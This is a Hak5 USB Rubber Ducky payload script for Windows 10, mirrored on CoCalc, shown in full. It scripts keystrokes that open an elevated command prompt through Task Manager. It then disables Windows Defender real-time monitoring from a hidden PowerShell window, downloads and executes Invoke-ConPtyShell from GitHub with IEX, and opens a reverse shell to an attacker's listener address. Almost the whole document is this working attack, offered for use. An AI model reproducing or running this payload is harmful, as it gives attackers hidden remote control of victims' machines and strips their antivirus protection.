CoCalc -- Payload.txt.txt

GitHub Repository: hak5/usbrubberducky-payloads
Path: blob/master/payloads/library/remote_access/NSHELL/Payload.txt.txt
²⁹⁶⁴ views

1
REM Title: Admin Reverse shell
2
REM Author: Naitik Dharmendra Joshi
3
REM Description: Opens cmd and with admin privileges and starts a reverse shell in hidden Powershell window
4
REM Target: Windows 10 (CMD, Powershell)
5
REM Version: 1.0
6
REM Category: General
7

8
REM Change the Following Details.
9
REM [LISTENER_IP_ADDRESS] IP Address of the Attacker System.
10
REM [PORT] The Port on the target system you want Netcat to listen on.
11

12
DELAY 300
13
GUI r
14
DELAY 20
15
REM --> Opens Task Manager
16
STRING taskmgr
17
DELAY 150
18
ALT f
19
n
20
DELAY 50
21
REM --> Starts CMD
22
STRING cmd
23
TAB
24
REM --> Turn On Admin Privileges
25
SPACE
26
REM --> Run
27
ENTER
28
DELAY 20
29

30
REM --> Kills TaskManager, Executes PowerShell Commands (Hidden), Disables Windows Defender and Executes a Reverse Shell
31
STRING taskkill /IM taskmgr.exe && powershell -WindowStyle hidden Set-MpPreference -DisableRealtimeMonitoring $true; IEX(IWR https://raw.githubusercontent.com/antonioCoco/ConPtyShell/master/Invoke-ConPtyShell.ps1 -UseBasicParsing); Invoke-ConPtyShell [LISTENER_IP_ADDRESS] [PORT]");
32

33
 
34

Product

Resources

Company